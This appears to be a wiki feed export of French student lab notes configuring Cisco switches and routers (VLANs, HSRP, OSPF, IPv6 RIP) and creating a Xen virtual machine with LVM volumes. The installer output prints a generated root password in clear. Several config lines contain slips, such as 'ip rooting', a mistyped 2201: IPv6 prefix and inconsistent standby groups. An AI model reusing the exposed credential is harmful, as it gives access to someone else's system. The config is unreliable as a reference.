    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51378</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51378"/>
				<updated>2019-11-28T18:09:04Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Creation des disques logique */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
